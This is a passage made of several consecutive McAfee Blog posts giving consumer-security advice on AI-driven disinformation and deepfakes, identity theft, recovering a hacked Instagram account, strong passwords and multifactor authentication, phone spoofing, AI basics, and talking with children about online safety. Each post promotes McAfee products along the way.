AI tools can certainly create content quickly, but they also do the work of many. What once took sizable ranks of writers, visual designers, and content producers to create fake stories, fake images, and fake videos now gets done with AI tools. Also as mentioned above, we’re seeing entire websites that run on AI-generated content, which then spawn social media posts that point to their phony articles.

Clickbait and switch — the “Disinformation Economy”

Largely we’ve talked about disinformation, fake news, and deepfakes in the context of politics and in attempts to mislead people. Yet there’s another thing about malicious deepfakes and the bad news they peddle. They’re profitable.

Bad news gets clicks, and clicks generate ad revenue. Now with AI powering increasingly high volumes of clickbait-y bad news, it’s led to what some researchers have coined the “Disinformation Economy.” This means that the creators of some deepfakes might not be politically motivated at all. They’re in it just for the money. The more people who fall for their fake stories, the more money they make as people click.

And early indications show that disinformation has broader economic effects as well.

Researchers at the Centre for Economic Policy Research (CEPR) in Europe have started exploring the impact of fake news on economic stability. In their first findings, they said, “Fake news profoundly influences economic dynamics.”[iv] Specifically they found that as fake news sows seeds of uncertainty, it reverberates through the economy, leading to increased unemployment rates and lower industrial production.

They further found bad news can lead to pessimism, particularly about the economy, which leads to people spending less and lower sales for companies — which further fuels unemployment and reductions in available jobs as companies cut back.[v]

Granted, these early findings beg more research. Yet we can say this: many people turn to social media for their news, the place where fake news and malicious deepfakes spread.

Global research from Reuters uncovered that more people primarily get their news from social media (30%) rather than from an established news site or app (22%).[vi] This marks the first time that social media has toppled direct access to news. Now, if that leads to exposure to significant portions of pessimistic fake news, it makes sense that millions of people could have their perceptions altered by it to some extent — which could translate into some form of economic impact.

Stopping the spread of disinformation and malicious deepfakes

As you can quickly surmise, that comes down to us. Collectively. The fewer people who like and share disinformation and malicious deepfakes, the quicker they’ll die off.

A few steps can help you do your part in curbing disinformation and malicious deepfakes …

Verify, then share.

This all starts by ensuring what you’re sharing is indeed the truth. Doubling back and doing some quick fact-checking can help you make sure that you’re passing along the truth. Once more, bad actors entirely rely on just how readily people can share and amplify content on social media. The platforms are built for it. Stop and verify the truth of the post before you share.

Come across something questionable? You can turn to one of the several fact-checking organizations and media outlets that make it their business to separate fact from fiction:

• Politifact.com
• Snopes.com
• Factcheck.org
• Reuters Fact Check
• AP Fact Check

Flag falsehoods.

If you strongly suspect that something in your feed is a malicious deepfake, flag it. Social media platforms have reporting mechanisms built in, which typically include a reason for flagging the content.

Get yourself a Deepfake Detector.

Our new Deepfake Detector spots AI phonies in seconds. It works in the background as you browse — and lets you know if a video or audio clip was created with AI audio. All with 95% accuracy.

Deepfake Detector monitors audio being played through your browser to determine if the content you’re watching or listening to contains AI-generated audio. McAfee doesn’t store any of this audio or browsing history.

Further, a browser extension shows just how much audio was deepfaked, and at what point in the video that content cropped up.

McAfee Deepfake Detector is available for English language detection in select new Lenovo AI PCs, ordered on Lenovo.com and select local retailers in the U.S., UK, and Australia.

Stopping deepfakes really comes down to us

From January to July of 2024, states across the U.S. introduced or passed 151 bills that deal with malicious deepfakes and deceptive media.[vii] However, stopping their spread really comes down to us.

The people behind AI-powered fake news absolutely rely on us to pass them along. That’s how fake news takes root, and that’s how it gets an audience. Verifying that what you’re about to share is true is vital — as is flagging what you find to be untrue or questionable.

Whether you use fact-checking sites to verify what you come across online, use a tool like our Deepfake Detector, or simply take a pass on sharing something that seems questionable, they’re all ways you can stop the spread of disinformation.

[i] https://sumsub.com/newsroom/deepfake-cases-surge-in-countries-holding-2024-elections-sumsub-research-shows/

[ii] https://www.merriam-webster.com/dictionary/deepfake

[iii] https://science.sciencemag.org/content/359/6380/1146

[iv] https://cepr.org/voxeu/columns/buzz-bust-how-fake-news-shapes-business-cycle

[v] https://www.uni-bonn.de/en/news/134-2024

[vi] https://reutersinstitute.politics.ox.ac.uk/digital-news-report/2023/dnr-executive-summary

[vii] Ibid.

The post Clickbait and Switch: How AI Makes Disinformation Go Viral appeared first on McAfee Blog.

You crack open your credit card statement and something seems … off. Maybe it’s a couple of small online purchases that make you think, “Hmm, that’s strange.” Or maybe a statement shows up in your mailbox — one for a card that you don’t own at all. That calls for a huge “What the heck???” Sure enough, you’re looking at cases of identity fraud and theft.

And there’s a difference between identity fraud and identity theft. It’s subtle. And because of that, they often get used interchangeably. Each one can really sting but in different ways.

Identity fraud is…

• When someone steals your personal info to tap into an account you already have.
• Examples:
  • A crook gets hold of your debit card info from a data breach and buys a video game console with it.
  • You fall victim to a phishing attack while buying concert tickets. The crooks bundle up your credit card info with the info from thousands of other victims. Then they sell it on the dark web.

Identity theft is…

• When someone uses your personal info to open new accounts in your name — or impersonates you in other ways.
• Examples:
  • A crook uses your personal info to open a new line of credit at a furniture store under your name and buys a couple of massaging recliners with it.
  • A criminal uses your Social Security Number (SSN) to create a driver’s license with their likeness but with your name and personal info.

So, put simply, identity fraud involves stealing from an existing account. Identity theft means that someone used your personal info to impersonate you in some way, such as opening new accounts in your name.

Top forms of identity theft and fraud

Each year, the U.S. Federal Trade Commission (FTC) publishes a data book that collects consumer reports of fraud, identity theft, and other similar crimes. Using the most recent data from the FTC, we can plot what the top forms of identity theft and fraud look like.

Credit cards

By far the top form of identity theft and fraud. As mentioned in the examples above, these can include crooks who string out several small purchases over time. All in the hope that the cardholder will overlook it. It can also include a one-whopper of a purchase for a big-ticket item. Here, the crook knows the card will likely get canceled quickly afterward. It’s a one-and-done deal.

Loans and leases

Second, we have loans and leases. This can range from student loans, personal loans, and auto loans, and to real estate rentals as well. Common across them all is someone impersonating you to take them out or tap into their funds in some way.

Bank accounts

Here, the creation of totally new accounts leads the way in this category. As we described above, that’s a form of identity theft. Yet identity fraud accounts for a noticeable chuck, which includes account takeovers. In these cases, crooks siphon off funds via debit cards, Electronic Funds Transfer (ETF), and other forms of withdrawal and transfer.

ID and government benefits

This covers cases where crooks use stolen personal info to get IDs. That includes driver’s licenses, passports, and other government documentation. Further, this category also encompasses the theft of government-issued benefits ranging from medical assistance to veteran’s pay.

Tax returns

While all forms of identity theft and fraud can pack a punch, this type hits particularly hard because it involves your SSN. Around tax time, scammers with access to SSNs will file bogus returns, all with the aim of claiming the refund for themselves.

Utilities

Largely, this involves people buying cell phones and opening new mobile accounts along with them. Yet it also includes people opening other utilities in other people’s names. Indeed, crooks will scam their way into getting free electricity, water, gas, and yes…cable TV.

Other important forms of identity theft and fraud to keep in mind

Although these forms don’t top the list in terms of reports, they still bear mentioning. They’re serious enough, and they can go undetected for some time before their victims find out.

Medical identity theft

In this form, an imposter receives care, medications, or medical devices in someone else’s name. They might pass off phony documentation to the care provider involved, the insurance company that pays for the care, or a combination of the two. A few things can happen as a result. It can impact the care you can get and the benefits you can use. In extreme cases, the thief’s health info can get mixed in with yours and impact your care. Medical identity theft is a good reason to closely review all the medical and insurance statements you get.

Child identity theft

Imagine your child about to rent a first apartment. The property management company runs a credit check, only to find a horrendous credit rating. But how? An identity thief has been using your child’s identity for years now. After all, what parent thinks, “I really should run a credit report on my kindergartener.” And that’s fair. However, signing up your child for identity is a sound move. It can help spot if your child’s identity got stolen.

Steps to take if you suspect that you’re the victim of identity theft

1) Notify the companies and institutions involved and consider a credit freeze.

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account in your credit monitoring service, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.

In the meantime, consider putting a security freeze in place. A security freeze service prevents others from opening new credit, bank, and utility accounts in your name.​ It won’t hit your credit score, and you can unfreeze it when needed. You’ll find this feature in our McAfee+ plans as well.

2) File a police report.

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Beyond that, filing a report is still a good idea. Identity theft is still theft, and reporting it provides an official record of it.

Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help you clear your name down the road. Likewise, save any evidence you have, such as statements or documents associated with the theft. They can help you clean up your record as well.

3) Contact the Federal Trade Commission (FTC).

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.

4) Contact the IRS, if needed.

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid by an employer you don’t know, contact that employer as well and let them know of possible fraud — namely that someone has stolen your identity and that you don’t truly work for them.

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call, nor will they call and apply harassing pressure tactics — only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.

5) Continue to monitor your credit report, invoices, and statements.

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, in addition to reviewing your accounts closely.

Several features in our McAfee+ plans can do this work, and quite a bit more, for you:

• Credit Monitoring helps you keep an eye on changes to your credit score, report, and accounts with timely notifications. Spot something unusual? It offers guidance so you can tackle identity theft.
• Identity Monitoring checks the dark web for your personal info, including email, government IDs, credit card and bank account numbers, and more. If any of it shows up on the dark web, it sends you an alert with guidance that can help protect you from identity theft.
• Our online protection software also offers several transaction monitoring features. They track transactions on credit cards and bank accounts — shooting you a notice if unusual activity occurs. They also track retirement accounts, investments, and loans for questionable transactions. Finally, further features can help prevent a bank account takeover and keep others from taking out short-term payday loans in your name.
• And finally, should the unexpected happen, our Identity Theft Coverage & Restoration can get you on the path to recovery. It offers up to $2 million in coverage for legal fees, travel, and funds lost because of identity theft. Further, a licensed recovery pro can do the work for you, taking the necessary steps to repair your identity and credit.

The post What Are the 6 Types of Identity Theft appeared first on McAfee Blog.

In my world of middle-aged mums (mams), Instagram is by far the most popular social media platform. While many of us still have Facebook, Instagram is where it all happens: messaging, sharing, and yes, of course – shopping!! So, when one of my gal pals discovers that her Instagram account has been hacked, there is understandably a lot of panic!

How Popular Is Instagram?

Believe it or not, Facebook is still hanging onto the top spot as the most popular social media platform with just over 3 billion active monthly users, according to Statista. YouTube comes in 2^nd place with 2.5 billion users. Instagram and WhatsApp tie in 3^rd place with 2 billion users each. Interestingly, TikTok has 1.5 billion users and is in 4^th place – but watch this space, I say!

Why Do Hackers Want To Hack My Instagram?

Despite Facebook having the most monthly users, it isn’t where the personal conversations and engagement take place. That’s Instagram’s sweet spot. Instagram messaging is where links are shared and real personal interaction occurs. In fact, a new report shows that Instagram accounts are targeted more than any other online account and makeup just over a quarter of all social media hacks. So, it makes sense why hackers would expend considerable energy in trying to hack Instagram accounts. They’ll have a much greater chance of success if they use a platform where there is an appetite and trust for sharing links and personal conversations.

But why do they want to get their hands on your account? Well, they may want to steal your personal information, scam your loyal followers by impersonating you, sell your username on the black market or even demand ransoms! Hacking Instagram is big business for professional scammers!!

What To Do If You’ve Been Hacked

So, you reach for your phone early one morning to do a quick scroll on Instagram before you start the day, but you can’t seem to log on. Mmmmm. You then see some texts from friends checking whether you have in fact become a cryptocurrency expert overnight. OK – something’s off. You then notice an email from Instagram notifying you that the email linked to your account has been changed. Looks like you’ve been hacked! But please don’t spend any time stressing. The most important thing is to take action ASAP as the longer hackers have access to your account, the greater the chance they can infiltrate your life and create chaos.

The good news is that if you act quickly and strategically, you may be able to get your account back. Here is what I suggest you do – fast!:

1. Change Your Password & Check Your Account

If you are still able to log in to your account then change your password immediately. And ensure it is a password you haven’t used anywhere else. Then do a quick audit of your account and fix any changes the hacker may have made eg remove access to any device you don’t recognise, any apps you didn’t install, and delete any email addresses that aren’t yours.

Next, turn on two-factor authentication (2FA) to make it harder for the hacker to get back into your account. This will take you less than a minute and is absolutely critical. Instagram will give you the option to receive the login code either via text message or via an authentication app. I always recommend the app in case you ever lose control of your phone.

But, if you are locked out of your account then move on to step 2.

2. Locate The Email From Instagram

Every time there is a change to your account details or some new login activity, Instagram will automatically send a message to the email address linked with the account

But there’s good news here. The email from Instagram will ask you if you in fact made the changes and will provide a link to secure your account in case it wasn’t you. Click on this link!! If you can access your account this way, immediately check that the only linked email address and recovery phone number are yours and delete anything that isn’t yours. Then change your password.

But if you’ve had no luck with this step, move on to step 3.

3. Request a Log-In Link

You can also ask Instagram to email or text you a login link. On an iPhone, you just need to select ‘forgot password?’ and on your Android phone, tap ‘get help logging in’. You will need to enter the username, email address, and phone number linked to your account.

No luck? Keep going…

4. Request a Security Code

If the login link won’t get you back in, the next step is to request a security code. Simply enter the username, email address, or phone number associated with your account, then tap on “Need more help?” Select your email address or phone number, then tap “Send security code” and follow the instructions.

5. Video Selfie

If you have exhausted all of these options and you’ve had no luck then chances are you have found your way to the Instagram Support Team. If you haven’t, simply click on the link and it will take you there. Now, if your hacked account contained pictures of you then you might just be in luck! The Support Team may ask you to take a video selfie to confirm who you are and that in fact you are a real person! This process can take a few business days. If you pass the test, you’ll be sent a link to reset your password.

How To Prevent Yourself From Getting Hacked?

So, you’ve got your Instagram account back – well done! But wouldn’t it be good to avoid all that stress again? Here are my top tips to make it hard for those hackers to take control of your Insta.

1. It’s All About Passwords

I have no doubt you’ve heard this before but it’s essential, I promise! Ensuring you have a complex and unique password for your Instagram account (and all your online accounts) is THE best way of keeping the hackers at bay. And if you’re serious about this you need to get yourself a password manager that can create (and remember) crazily complex and random passwords that are beyond any human ability to create. Check out McAfee’s TrueKey – a complete no-brainer!

2. Turn on Multifactor Authentication (MFA)

Multi-factor authentication adds another layer of security to your account making it that much harder for a hacker to get in. It takes minutes to set up and is essential if you’re serious about protecting yourself. It simply involves using a code to log in, in addition to your password. You can choose to receive the code via a text message or an authenticator app – always choose the app!

3. Choose How To Receive Login Alerts

Acting fast is the name of the game here so ensure your account is set up with your best contact details, so you receive login alerts ASAP. This can be the difference between salvaging your account and not. Ensure the alerts will be sent to where you are most likely to see them first so you can take action straight away!

4. Audit Any Third-Party Apps

Third-party apps that you have connected to your account could potentially be a security risk. So, only ever give third-party apps permission to access your account when absolutely necessary. I suggest taking a few minutes to disconnect any apps you no longer require to keep your private data as secure as possible.

Believe it or not, Instagram is not just an arena for middle-aged mums! I can guarantee that your teens will be on there too. So, next time you’re sharing a family dinner, why not tell them what you’re doing to prevent yourself from getting hacked? And if you’re not convinced they are listening? Perhaps remind them just how devastating it would be to lose access to their pics and their people. I am sure that might just work.

Till next time

Stay safe online!

Alex

The post My Instagram Has Been Hacked – What Do I Do Now? appeared first on McAfee Blog.

Imagine this: you wake up one morning to find that your bank account has been emptied overnight. Someone halfway across the world has accessed your account using a password you thought was secure. Incidents like these are unfortunately becoming more common, with identity theft and fraud cases steadily increasing over the last decade.

This month is Cybersecurity Awareness Month, with the theme “Secure Our World,” which serves as a timely reminder to reassess and enhance your cybersecurity strategies against ever-evolving cyber threats. In an election year, the digital landscape becomes a breeding ground for cyber scams and malicious activities aimed at exploiting political fervor and public uncertainty. With the 2024 election on the horizon, it’s more critical than ever to strengthen our cybersecurity defenses.

By prioritizing cybersecurity awareness and implementing robust protective measures during this dedicated month, you can safeguard your personal information, protect your financial assets, and ensure the security of your digital interactions. Let’s explore five simple yet powerful ways to increase your internet security and have peace of mind in today’s digital landscape.

1. Use Complex Passwords and a Password Manager

Passwords serve as the first line of defense against unauthorized access to your accounts but 78% of people use the same password for more than one account. Here’s how you can create and manage complex passwords:

• Aim for at least 12 characters.
• Use a mix of uppercase and lowercase letters, numbers, and special characters.
• Avoid easily guessable information like birthdays or names.
• Consider using a password manager, which generates and stores complex passwords for each of your accounts securely. They also autofill passwords for you, reducing the temptation to use weak or duplicate passwords.

2. Turn On Multifactor Authentication

Multifactor authentication (MFA) adds an extra layer of security by requiring two or more of the following factors to access your accounts:

• Knowledge Factor: Something only the user knows, such as a password or PIN.
• Possession Factor: Something the user has, like a smartphone or security token that generates a one-time code.
• Inherence Factor: Something inherent to the user, such as biometric data (fingerprint, facial recognition).

Follow these steps to enable multifactor authentication:

• Go to your account settings on each platform (e.g., email, social media, banking).
• Look for the security or privacy settings.
• Enable MFA by choosing to receive a code via SMS, email, or a dedicated app like Google Authenticator or Authy.
• Follow the prompts to complete the setup.

3. Recognize and Report Phishing Attempts

Phishing is a common tactic used by cybercriminals to trick you into revealing sensitive information by impersonating legitimate entities, such as banks or reputable companies, to lure individuals into disclosing sensitive information like passwords or credit card numbers. These attacks often occur via email, text messages, or fake websites designed to appear authentic, exploiting human trust and curiosity to steal valuable data for malicious purposes.

How to spot phishing attempts

Identifying Phishing Emails:

• Check the sender’s email address for inconsistencies or suspicious domains.
• Be skeptical of urgent language, requests for personal information, or threats of consequences.
• Verify links by hovering over them to see the actual URL before clicking.
• If an email contains an attachment that you weren’t expecting or that seems suspicious (such as .exe files), do not open it. Attachments can contain malware that compromises your computer’s security.

Reporting Phishing:

• If you receive a phishing email, report it to the organization being impersonated (e.g., your bank).
• Most email providers also have tools to report phishing directly from your inbox.

4. Update Software Regularly

Software updates, also known as patches, often include security fixes to protect against known vulnerabilities. Here’s how to keep your software up to date:

Updating Operating Systems and Applications:

• Enable automatic updates on your devices: Most operating systems (such as Windows, macOS, and Linux) and software applications allow you to enable automatic updates. This feature ensures that your software receives the latest patches and security fixes without requiring manual intervention.
• Check for Updates Manually: Even if you have automatic updates enabled, it’s a good practice to manually check for updates periodically, especially for critical software like your operating system, web browsers, antivirus programs, and any applications you use frequently.
• Mobile Devices and Apps: For smartphones and tablets, regularly check for updates in your device’s settings. Additionally, update apps from trusted app stores like Google Play Store (Android) or Apple App Store (iOS).
• Update All Software: It’s not just your operating system and major applications that need updating. Remember to update plugins (like Adobe Flash, Java, and browser extensions) and firmware for devices like routers connected to your network.

5. Secure Your Social Media

Social media platforms are integral parts of modern communication, but they also pose significant security risks if not managed carefully. Here are essential tips to enhance your social media security:

• Review Privacy Settings: Regularly review and adjust your privacy settings on social media platforms to control who can see your posts, personal information, and contact details. Limit the visibility of your profile and posts to only those you trust. Social Privacy Manager can streamline the customization of over 100 privacy settings on your social media accounts with just a few clicks.
• Be Cautious of Third-Party Apps: Review and revoke access for third-party applications linked to your social media accounts that no longer need access or seem suspicious. These apps can potentially compromise your account’s security.

By implementing these straightforward yet effective cybersecurity practices, you can significantly reduce the risk of falling victim to online threats. McAfee+ can also keep you more secure and private online with 24/7 scans of the dark web to ensure your personal and financial info is safe, alerts about suspicious financial transactions and credit activity, and up to $2 million in identity theft coverage and restoration.

The post Top Tips for Cybersecurity Awareness Month appeared first on McAfee Blog.

From impersonating police officers in Pennsylvania to employees of the City of San Antonio, scammers have been impersonating officials nationwide in order to scam people. A nurse in New York even lost her life savings to a spoofing scam.  Phone spoofing is a technique used by callers to disguise their true identity and phone number when making calls. By altering the caller ID information displayed on the recipient’s phone, spoofers can make it appear as though the call is coming from a different number, often one that looks more trustworthy or familiar to the recipient. This deceptive practice is commonly employed by telemarketers, scammers, and individuals seeking to engage in fraudulent activities, making it more difficult for recipients to identify and block unwanted or suspicious calls. 

How Does Phone Spoofing Work? 

Most spoofing is done using a VoIP (Voice over Internet Protocol) service or IP phone that uses VoIP to transmit calls over the internet. VoIP users can usually choose their preferred number or name to be displayed on the caller ID when they set up their account. Some providers even offer spoofing services that work like a prepaid calling card. Customers pay for a PIN code to use when calling their provider, allowing them to select both the destination‘s number they want to call, as well as the number they want to appear on the recipient’s caller ID.  

What Are The Dangers of Phone Spoofing? 

Scammers often use spoofing to try to trick people into handing over money, personal information, or both. They may pretend to be calling from a bank, a charity, or even a contest, offering a phony prize. These “vishing” attacks (or “voice phishing”), are quite common, and often target older people who are not as aware of this threat. 

For instance, one common scam appears to come from the IRS. The caller tries to scare the receiver into thinking that they owe money for back taxes, or need to send over sensitive financial information right away. Another common scam is fake tech support, where the caller claims to be from a recognizable company, like Microsoft, claiming there is a problem with your computer and they need remote access to fix it. 

There are also “SMiShing” attacks, or phishing via text message, in which you may receive a message that appears to come from a reputable person or company, encouraging you to click on a link. But once you do, it can download malware onto your device, sign you up for a premium service, or even steal your credentials for your online accounts. 

Why Is Spoofing So Prevalent? 

The convenience of sending digital voice signals over the internet has led to an explosion of spam and robocalls over the past few years.  Between January 2019 and September 2023, Americans lodged 2.04 million complaints about unwanted phone calls where people or robots falsely posed as government representatives, legitimate business entities, or people affiliated with them. 

Since robocalls use a computerized autodialer to deliver pre-recorded messages, marketers and scammers can place many more calls than a live person ever could, often employing tricks such as making the call appear to come from the recipient’s own area code. This increases the chance that the recipient will answer the call, thinking it is from a local friend or business. 

And because many of these calls are from scammers or shady marketing groups, just registering your number on the FTC’s official “National Do Not Call Registry” does little help. That’s because only real companies that follow the law respect the registry. 

What Can I Do To Stop Spoofing Calls? 

To really cut back on these calls, the first thing you should do is check to see if your phone carrier has a service or app that helps identify and filter out spam calls. 

For instance, both AT&T and Verizon have apps that provide spam screening or fraud warnings, although they may cost you extra each month. T-Mobile warns customers if a call is likely a scam when it appears on your phone screen, and you can sign up for a scam-blocking service for free. 

There are also third-party apps such as RoboKiller that you can download to help you screen calls, but you should be aware that you will be sharing private data with them. 

Other Tips For Dealing With Unwanted Calls 

1. After registering for the Do Not Call Registry and checking out your carrier’s options, be very cautious when it comes to sharing your contact information. If an online form asks for your phone number but does not need it, leave that field blank. Also, avoid listing your personal phone number on your social media profiles.
2. If you receive a call from an unrecognized number, do not answer it. You can always return the call later to see if it was a real person or company. If it was a scam call, you can choose to block the number in your phone, but that too can be frustrating since scammers change their numbers so often.
3. You can report unwanted calls to the FTC.
4. Read the privacy policy on every new service you sign up for to make sure that they will not share or sell your contact information.
5. Be wary of entering contests and sweepstakes online, since they often share data with other companies.
6. Stay up-to-date on the latest scams, so you can recognize potential threats.

Enhance your smartphone security effortlessly with McAfee+ which has 24/7 identity monitoring and alerts, advanced privacy features, and AI-powered security for real-time protection against viruses, hackers, and risky links.  

The post How to Stop Phone Spoofing appeared first on McAfee Blog.

At the beginning of the year, the Associated Press described artificial intelligence (AI) as “easily the biggest buzzword for world leaders and corporate bosses.” You’ve likely heard talk about AI everywhere from the news to social media to around the dinner table. Amid this chatter, it’s easy to wonder: what exactly is AI, and why is it of such importance?

Artificial intelligence is defined as “a machine’s ability to perform the cognitive functions we associate with human minds, such as perceiving, reasoning, learning, interacting with the environment, problem-solving, and even exercising creativity.” AI is a branch of computer science with subfields, including machine learning, natural language processing, and robotics.

Historical background and evolution of AI

AI traces its roots to the mid-20th century, with pioneers like Alan Turing and John McCarthy laying the groundwork for its development. In 1956, the Dartmouth Conference marked a significant milestone, officially inaugurating AI as a distinct field of study.

Since then, AI has evolved rapidly, with researchers and innovators continuously pushing boundaries to create intelligent machines capable of emulating human cognitive abilities. AI’s potential impact on technology, society, and various industries continues to expand, shaping the way we live, work, and interact with the world around us.

How AI helps people daily

Most people interact with AI every day, often without even realizing it. AI has become integrated into daily life, simplifying tasks, delivering personalized content, and enhancing convenience for consumers across various digital platforms. From using voice assistants like Siri or Alexa to receiving personalized recommendations on streaming platforms like Netflix or Spotify, AI plays a significant role in enhancing user experiences.

Social media platforms utilize AI algorithms to curate news feeds and suggest content tailored to individual preferences. AI-powered product recommendations and chatbots that assist with customer inquiries enrich online shopping experiences. Ride-sharing services employ AI to match drivers with passengers efficiently, enhancing accessibility and reducing wait times.

AI chatbots like ChatGPT assist people daily by providing instant access to information and guidance. Whether troubleshooting technical issues, offering advice, or providing recommendations, AI chatbots serve as efficient virtual assistants that enable users to quickly find solutions to their questions.

AI has the potential to revolutionize industries, address societal challenges, and transform everyday life through increased efficiency and innovation. For example, in healthcare, new hope for a cancer cure has emerged as a personalized cancer vaccine is being developed using AI and DNA sequencing. AI-powered systems are also assisting doctors in diagnosing diseases more accurately and quickly, leading to better patient outcomes.

This kind of progress is incredible, but AI also presents challenges and risks.

The negative consequences of AI

One notably concerning aspect is the rise of deepfake technology, which enables the creation of highly realistic but fake videos or audio recordings. These deepfakes can be used for everything from voice cloning attacks to creating a fake Taylor Swift advertisement. Deepfakes have the potential to deceive and manipulate individuals, spread misinformation, and undermine trust in visual and audio media.

In an election year, AI-driven manipulation is especially dangerous. From automated disinformation campaigns to targeted voter suppression tactics, AI algorithms can be deployed to sway public opinion, amplify divisive rhetoric, and undermine the integrity of the electoral process. Deepfake videos could be used to fabricate scandalous incidents or speeches, leading to widespread confusion and mistrust among voters. That’s why we joined other leading tech companies in a commitment to combat the deceptive use of AI in the 2024 elections.

In addition to deepfake technology, AI is being increasingly utilized for nefarious purposes such as phishing attacks. By leveraging AI algorithms, hackers can craft highly convincing emails or messages impersonating trusted individuals or organizations. These AI-driven phishing attempts can manipulate individuals into divulging sensitive information or clicking on malicious links.

Consequently, there is a pressing need to develop safeguards to mitigate AI’s negative impact while harnessing its positive potential for the benefit of society. Individuals can utilize identity theft protection software powered by AI to stay vigilant against such threats, receiving real-time alerts about suspicious activities and potential breaches to safeguard their personal information.

AI represents the frontier where technology converges with the complexities of human intelligence, propelling innovation towards unprecedented realms of possibility. It holds immense significance in today’s world because it offers unprecedented opportunities for innovation and progress.

The post What is Artificial Intelligence? appeared first on McAfee Blog.

What if I told you that the most important thing you need to keep your kids safe online doesn’t come in a box or via a download? And that it doesn’t require you to be monitoring or supervising their every move. And even better – it doesn’t cost any money!! Yep – you’d be interested, I’m sure. After almost 13 years as Cybermum, I’ve experienced plenty of ‘aha’ cybersafety moments. But, without doubt, one of the biggest learnings for me is that creating a family culture where there is calm, honest, and truly open communication is the best way to protect your kids online. In fact, it’s likely far more powerful than the latest apps or software, and here’s why…

Like It Or Not, Screens Are Here To Stay

I’m a big fan of trying to minimise the amount of time kids spend in front of a screen for so many reasons. There is a plethora of research to support how ‘too much’ screen time can adversely affect kids’ behaviour. A 2022 US study of K-12 educators in the US showed that 80% of educators believed that increased screen time worsened children’s behaviour. There are studies that show excessive (and early) screen time can potentially affect a child’s cognitive, linguistic, and social-emotional growth. And even some research shows that the effects of excessive screen time can be similar to the symptoms of autism.

But the reality is that screens aren’t going anywhere soon. We live in a digital world where you actually can’t go about your business without a device and a screen. When was the last time you tried going into a bank branch??? Instead, I believe we need to think of screens a little like we think of sugar. We know it’s not great for us, so we try and minimise our intake.

But how good would it be if our kids understood this perspective, so they also realised that too much screen time wasn’t ideal? Well, they can – weave it into family conversations!

24/7 Monitoring Is Impossible – You Have To Sleep and Work and Live!

When ‘digital parenting’ became a thing about 15 – 20 years ago, we were all told that we needed to constantly monitor our kids to ensure they weren’t visiting inappropriate websites or speaking to strangers online. I remember trying so hard to stay across the online movements of four kids – I’ve got to admit it was quite time-consuming and exhausting!! Full credit to those parents who put in the hours to keep their kids safe.

Fast forward to 2024 and there is now a comprehensive range of ‘parental control’ apps and software that can act as another set of ‘eyes and ears’ for parents. And while they can be great tools to have in your digital parenting toolbox, they are not the silver bullet. What happens when your child is visiting at another family’s house that doesn’t have parental controls set up? What happens if your child uses a friend’s device while travelling home on the bus to ‘get around’ the parental controls at home? And what about, if they work out how to turn them off?? Remember, are digital natives are quite savvy!!

But if you regularly talk online safety with your kids at home then you have a big head start here. In fact, your stress levels should be relatively low. When you make it a priority to talk to your kids about what they do online – in a non-judgemental way – and share your stories, the latest trends and risks then you are in a good place. If your kids know you understand their digital life, know that you can handle the tough stuff, and know with 100% confidence that you are NOT going to go berserk if they come to you with a problem then you do not need to worry about monitoring their every move. You’ve empowered them with knowledge and offered them a safety net – perfect!

How To Create a Culture of Calm and Honest Communication

Before I share my top tips with you I want to make it very clear that this is not an exercise in being a perfect parent. There is no such thing as a perfect parent – we are all on a journey and learning as we go. So, please don’t feel psyched out or worry that it’s too late. We’re all doing the best we can to raise our kids – so just keep on keeping on!

There are a few key things that I believe contribute to creating a top-notch communication culture in a family. Here are my top recommendations.

1. Active Listening Is Essential

I learnt pretty early on in my parenting career that if you’re not being an active listener, you’re not really getting the full story. Active listening happens when you’re fully engaged with your child and is one of the best ways to communicate that you care and that you’re interested which in turn encourages them to open up more. Perfect! Here’s what I suggest:

• Use body language to show you’re paying attention – make eye contact, face them, and be at their level (if they are shorter than you)
• Pay attention to their facial expression and body language too. Sometimes words only tell part of the story.
• Ask questions to encourage them to share more ‘tell me more’ or ‘what happened next?’
• Don’t finish their sentences or interrupt – even if they are stalling or struggling to find the right words. Bite your tongue, if you need to!
• Resist the urge to problem-solve straight away. Sometimes they just need someone to listen and share with.

2. Commit To Being Calm

Let’s be honest, very few of us are calm or relaxed 365 days of the year! But if you’re keen to maximise the chances that your kids will come to you if they do find themselves in a tricky situation then you need to ‘fake it till you make it’ my friends!

Conflict and heated discussions with teens are inevitable – I’ve definitely had my fair share! But it’s how you work through it that’s important. If you want a truly open and honest relationship with your child where they feel safe to talk about awkward things like sex, alcohol, cyberbullying, and even pornography, then you need to be ready to manage your own feelings and reactions when you hear things that you don’t expect or simply don’t like.

If you’re struggling to remain calm and deal with emotions from conversations with your teen then why not take some time to invest in yourself? Hit the road and walk it off, find some breathing exercises or a meditation on YouTube, or pick up the phone and call a friend.  By role-modelling honest conversation and a calm approach, you’re teaching your children how to be respectful and calm and have open and tough conversations. What a life skill!

And if you can’t manage to remain calm and you lose your cool – simply apologise, give them a hug, and commit to doing better next time.

3. Don’t Shy Away From The Tricky Stuff eg Sex, Pornography and Cyberbullying

When I was growing up, I had a few friends who had very open relationships with their parents. Everything was discussed – nothing was off-limits! These friends all had a certain confidence, a knowing that they had someone in their corner who had their back, wouldn’t judge, and would be their ‘come what may’ for any situation. I was a little jealous!

